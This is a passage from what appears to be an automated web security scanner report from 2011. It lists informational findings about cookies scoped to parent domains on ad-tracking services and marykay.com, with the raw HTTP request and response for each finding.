Etag: "833b91a59b2962c75db21f499c2e9829d1408b57"
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: Krux Cache
Set-Cookie: ServedBy=logger-b003; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:20:27 GMT
Via: 1.1 logger-b003.krxd.net
X-Age: 1
X-Cache: HIT
X-Cache-Hits: 1
X-GeoIP: 50.23.123.106
X-Request-Backend: geoip
X-Request-Time: D=543 t=1315321227510505
X-Served-By: logger-b003.krxd.net
X-Served-By: logger-b003.krxd.net
Content-Length: 75
Connection: keep-alive

KRUX.ST.geo={"country": "US", "region": "TX", "city": "Dallas", "dma": 623}

12.64. http://services.krxd.net/pixel.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://services.krxd.net
Path:	/pixel.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ServedBy=logger-b011; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:17:00 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel.gif?_kcp_d=cnbc.com&_kpref_=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D(The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM)%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh&_kuid=HK4OZLzp&_kpa_site=cnbc&_kpa_sect=home&_kpa_sub=homeus&_kpa_pageid=15839285&_kpa__c=homeus&_kpa_tandomad=none&_kpa_pm=1&kplt0=146&fired=beforeunload&_knifr=4&_kpid=d719e39d-e4be-4896-8d71-71012d0c51a0&_kcp_s=cnbc.com&_kcp_sc=home&_kcp_ssc=homeus HTTP/1.1
Host: services.krxd.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _kuid_=10.32.46.226.1315320921124944; ServedBy=logger-b005

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: private, no-cache, no-store
Content-Type: image/gif
Date: Tue, 06 Sep 2011 14:57:00 GMT
Last-Modified: Thu, 25 Aug 2011 01:26:31 GMT
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: Apache
Set-Cookie: ServedBy=logger-b011; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:17:00 GMT
X-Request-Time: D=258 t=1315321020652677
X-Served-By: logger-b011.krxd.net
Content-Length: 42
Connection: keep-alive

GIF89a.............!.......,........@..D.;

12.65. http://tags.bluekai.com/site/3834 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/3834

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=noTeVCDC+h5Mq/0A; expires=Sun, 04-Mar-2012 15:00:28 GMT; path=/; domain=.bluekai.com
bkc=KJh5NWN/PaWDOded4KdBCeBMU2HYoSeJ7/u1/GJYZ5aaCx+4xHCukG+CUnHNTzRGvOske0M/Hul5ODV/+R7WYP3tzaa1RnVRwixUqx/q0eg7pjp7wH4ZpK1cdlmdlgtl+CVTUesT4Uy6B9O38YccQ0AGeyKqf3974ytRLUyCoElGZmFaiHl9RLge7d8ufs2PGlyLoXlNTAdqQRBBcr8NkAvFT5T6keAF7iswgH71qCEeJB8sFr3TXkwfxzJEqFsNQbgm7pZQp4lqU3ctrdTPxh2F/72+2m4eG/7VbrPLwzdpR0d5Ne82x8F4TMn2wVLaOkqw67yUMgv4mrqhiJ2xd4yXzsgiDkEwfofD8gpTa3l+mLllH4+9fm2q+WBbqcm2IJ6w2Wye5XCKyIBU+eIz6a8twcJWINYq53aaZdrlEqdRFlCF6dQgZ4gTtw8FvJ2nSlBfTrLJVGXCsgwkADOftwn6B+owbyqFnDX8EkSNLTflmKqthj2ozLZEyWUydcjaeChpUk0Adq5D1li1KMNfd0iDmudKAysStypZcFUcEMFZFcCF12675O8K8yr6F0rftV+6Y5MZFciuI++J8IFXXfbG7gN/btIqXIJU2etY1gYxbT62k5UZFnC1pkYIrNY/7D2gzNbXuFlB64tun4UWwr0RXIvdBwXFsyRdmMS2zkKfBSK2lvf5HI4eBgzF4+MT4Fzd5GjWd95p2O71; expires=Sun, 04-Mar-2012 15:00:28 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3834 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: bk=gmD52hDC+h5Mq/0A; bkc=KJh5NeNGDNWROreldiEuJLD45sinQgWZa3GG/iQ+uErG5mCPWvPGLDB/CbTmnG3Yk+nie0MRxz5rQivkrGikWHy5miQH3Qfho2MOHSiYN4Kf0qA2lTczJ9IXlp77mdKKZy5xF9o1chZnwwfwXpgU37lVXDiTT5HVRvcPhIdOurvF5Dd8zWaqbG6dqQct+4iTtNtJdvqf1NYVFwW64V7PyXhbmDgMEKhhhfD4tF5EF7JfGOlV54fAUZtjldR0h2ddghyaKOlfulmI9O8SrazFjCo8bDIXKWwfhcP+IEVrXr+oOpY6zGg2pCXuwlWLbpaIpw38mKeTkx+hFqClxkF0hMK8+tFL2l7UDmJFZfxMUgSklFC+9wHB9q5oFI7nafU4c2PKzMhbDnr7DfFDgilptIR7XDdt5TFggtDqbh1cFbOXm31+Thk4ulWdCgkZ0bmC2GMk3zNX7+RXFn1XbEC5NXT8lrNRhM4IhmquhTepAwbthyT5u2bTpm5FXRIcHtMDidK1xP70hMrpxar7C2ZcQTApMiPFFvLBsmj8KaDLX4ZrfHYFXiPQVdnsW8hFsXdUZVzezqNTQ4+FVdnsnlAdyiGyUICwwJ7EkghhkzT0lNL3Ju8Z+YPFF1n8jFkI0PUbWC2ync7MFIpdXf3cfdABn2dHfiCGnlPoedOXtJqhMHX6f2I2e26Hi42z+Q0L; bko=KJhf0X49XB1pNRIHyjQ4hMGZ0LexgykilKOQRcY+ixS0JgWh1shPX4PMj8M/eVWh1jpZRZeGOq/RsKETRS0pleeVnhW/iT7Cei21nOc/rLReWo1atF+YpzSwZDWu0ZJA99YljOt7; bkp1=; bku=kQ199JnSvDfyUEoR; bkw5=KJ0aAg6FxNWRh7dUE4UeP6LMyzYAxSDkOAv6m7uQ9bnSHkn2J6H1H9KhtuyZGNkihivHBm/wxmQPBGwGJLfg+MtPa7zT8IxXfd1Ipl7KIpA12agz3LNenQTsqLdj/50Bt/CcqEbmhMHueWJL0YnSj33fMlWyvjMOw+ubcojN1yFmAmRcZJFxdaaPWlBqleiC7SZkh7pdovgiMSyOUxuZsNzB3u3Dab70LpaF3XHlTs/VTZVUeATMQCE1u9X10BkPxMbeUWjVCII8Sn9U+PItKYklnNc+Iu40IiLic/4u1SsLPrI8F+5dMcO1hZ1ht9HKMCK6rkK5SSkAS5RQeyAfd0LWrD8GJvDuhtVHP+6bYYNgjcFaHixpAbt17j7TtaP/EYcFCFyBE6kGPC0Mb+7mlm68pXFBpefkMFASUi4ajm1o73h3UxKwvSNf/m4V03pr6loVdH7oUwgrfvPfEukVc4tPjqlEn2H6MMT=; bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRxmpn+16wb9D9y+ejQPVux9SlyLv; bkst=KJhBEf+v9NWDwWP91aWetZGPLwcY7FrIVrQSPyCZN6i/uL9irlzUJuxH1Ri2k7bOvqVhLTiPkHXQPGodTu5T5b+15jQj8L0DTc6KcvqgmNWJw+h5Q8C8BOaVWYA0ugiUS5/pNJ9AkMEVNiS2Nsh+qpFdkdwwyUMRcT8rC+IP6aadMkGsokO0vxPcnqDVE9MpVXCl84yeE87CUcZWoSi/PiRM6ioameG/0twHLtINlw2z7F7yDaYgaR9P/YQ1SrGhxjWpoEtMI5BMyIkgYy9PbcSwg68lypTm2iXZjlrm4NZzijGVDj2n9O+x2TBtzBeLBgBsJh3xTvHNKblwO2AGeeSpP7HTPOIwnGwx2TBmdS5RAPEpYAyZ1+q1/CD357rHozAWzFtIZk59e0VEDi3rLwl3HddTzNKo; __utma=252226138.2034852110.1313672419.1313672419.1313681721.2; __utmz=252226138.1313681721.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; bklc=4e66358a; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:28 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Wed, 07 Sep 2011 15:00:28 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=noTeVCDC+h5Mq/0A; expires=Sun, 04-Mar-2012 15:00:28 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5NWN/PaWDOded4KdBCeBMU2HYoSeJ7/u1/GJYZ5aaCx+4xHCukG+CUnHNTzRGvOske0M/Hul5ODV/+R7WYP3tzaa1RnVRwixUqx/q0eg7pjp7wH4ZpK1cdlmdlgtl+CVTUesT4Uy6B9O38YccQ0AGeyKqf3974ytRLUyCoElGZmFaiHl9RLge7d8ufs2PGlyLoXlNTAdqQRBBcr8NkAvFT5T6keAF7iswgH71qCEeJB8sFr3TXkwfxzJEqFsNQbgm7pZQp4lqU3ctrdTPxh2F/72+2m4eG/7VbrPLwzdpR0d5Ne82x8F4TMn2wVLaOkqw67yUMgv4mrqhiJ2xd4yXzsgiDkEwfofD8gpTa3l+mLllH4+9fm2q+WBbqcm2IJ6w2Wye5XCKyIBU+eIz6a8twcJWINYq53aaZdrlEqdRFlCF6dQgZ4gTtw8FvJ2nSlBfTrLJVGXCsgwkADOftwn6B+owbyqFnDX8EkSNLTflmKqthj2ozLZEyWUydcjaeChpUk0Adq5D1li1KMNfd0iDmudKAysStypZcFUcEMFZFcCF12675O8K8yr6F0rftV+6Y5MZFciuI++J8IFXXfbG7gN/btIqXIJU2etY1gYxbT62k5UZFnC1pkYIrNY/7D2gzNbXuFlB64tun4UWwr0RXIvdBwXFsyRdmMS2zkKfBSK2lvf5HI4eBgzF4+MT4Fzd5GjWd95p2O71; expires=Sun, 04-Mar-2012 15:00:28 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Wed, 07-Sep-2011 15:00:28 GMT; path=/; domain=.bluekai.com
BK-Server: bbc9
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

12.66. http://www.actonsoftware.com/acton/bn/1227/visitor.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.actonsoftware.com
Path:	/acton/bn/1227/visitor.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wp1227=UVVADDDDDDTKKMZM; Domain=.actonsoftware.com; Expires=Wed, 05-Sep-2012 15:32:50 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /acton/bn/1227/visitor.gif?ts=1315341157226&ref=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG+e-commerce+solutio HTTP/1.1
Host: www.actonsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: wp1227=UVVADDDDDDTKKMZM; Domain=.actonsoftware.com; Expires=Wed, 05-Sep-2012 15:32:50 GMT; Path=/
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: image/gif;charset=UTF-8
Content-Length: 43
Date: Tue, 06 Sep 2011 15:32:49 GMT
Connection: close

GIF89a.............!.......,...........L..;

12.67. http://www.bizographics.com/collect/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bizographics.com
Path:	/collect/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Sun, 04-Sep-2016 15:33:01 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /collect/?pid=901&url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&pageUrl=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&time=1315341168499 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:33:01 GMT
Server: nginx/0.7.61
Set-Cookie: BizographicsID=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/
Set-Cookie: BizoID=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/
Set-Cookie: BizoData=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/
Set-Cookie: BizoCustomSegments=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/
Set-Cookie: BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Sun, 04-Sep-2016 15:33:01 GMT; Path=/
Content-Length: 9
Connection: keep-alive

//opt out

12.68. http://www.marykay.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=9C5046FD4D123B0E95A0D3931B51113E; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?pid=mk HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 137
Content-Type: text/html; charset=utf-8
Location: /default.aspx?pid=mk
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: Subsidiary=US; path=/
Set-Cookie: TLTHID=9C5046FD4D123B0E95A0D3931B51113E; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:44 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:45 GMT; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/default.aspx?pid=mk">here</a>.</h2>
</body></html>

12.69. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=B0890FBE43C33E288B82AEB1B9B92B68; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CONTENT/HPflash/Thumbs/tb_eyebundles.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 880
Content-Type: image/jpeg
Last-Modified: Tue, 07 Jun 2011 19:44:24 GMT
Accept-Ranges: bytes
ETag: "8661ea4d4b25cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=B0890FBE43C33E288B82AEB1B9B92B68; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

............................................................................................................#..
...[SNIP]...

12.70. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=D17FE5DF44B2B04AF2B926961FD1F468; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CONTENT/HPflash/Thumbs/tb_makeupartist.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 960
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:22:36 GMT
Accept-Ranges: bytes
ETag: "5fe4339c621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=D17FE5DF44B2B04AF2B926961FD1F468; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

............................................................................................................#..
...[SNIP]...

12.71. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=0F87CA454A59967B490C06993C603D8E; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 920
Content-Type: image/jpeg
Last-Modified: Mon, 15 Aug 2011 19:40:43 GMT
Accept-Ranges: bytes
ETag: "ff998738835bcc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0F87CA454A59967B490C06993C603D8E; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

............................................................................................................#..
...[SNIP]...

12.72. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_twrandr.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/CONTENT/HPflash/Thumbs/tb_twrandr.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=CCFC47FF43ECAF98B4F799BC3EFBF379; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CONTENT/HPflash/Thumbs/tb_twrandr.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 848
Content-Type: image/jpeg
Last-Modified: Mon, 01 Aug 2011 21:07:50 GMT
Accept-Ranges: bytes
ETag: "5da24128f50cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=CCFC47FF43ECAF98B4F799BC3EFBF379; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

............................................................................................................#..
...[SNIP]...

12.73. http://www.marykay.com/Common/SiteCatalyst/marykaycom/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Common/SiteCatalyst/marykaycom/s_code.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Common/SiteCatalyst/marykaycom/s_code.js HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 41434
Content-Type: application/x-javascript
Last-Modified: Thu, 14 Jul 2011 12:43:01 GMT
Accept-Ranges: bytes
ETag: "8078f2902342cc1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:47 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

/* SiteCatalyst code version: H.23.3.
Copyright 1996-2011 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */
/************************ ADDITIONAL FEATURES ***********
...[SNIP]...

12.74. http://www.marykay.com/Content/HPflash/245_eyeColorBundle.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Content/HPflash/245_eyeColorBundle.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=C626A75243F4FAE68012C595A3FF22D3; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Content/HPflash/245_eyeColorBundle.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 45207
Content-Type: application/x-shockwave-flash
Last-Modified: Thu, 02 Jun 2011 09:19:26 GMT
Accept-Ranges: bytes
ETag: "9b534f2b621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=C626A75243F4FAE68012C595A3FF22D3; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

CWS.....x....XT..?z..F@BJBJRPzP.E:...nI.A....T..AB.$.)I.K ......../.|..............9{.....X...9....j.h.....7.H.....a........9&/.{G71.$.l...,.......y.....O@TT.._.OP....q.vt7..qtca.bB[.a.f.j..n....*..u
...[SNIP]...

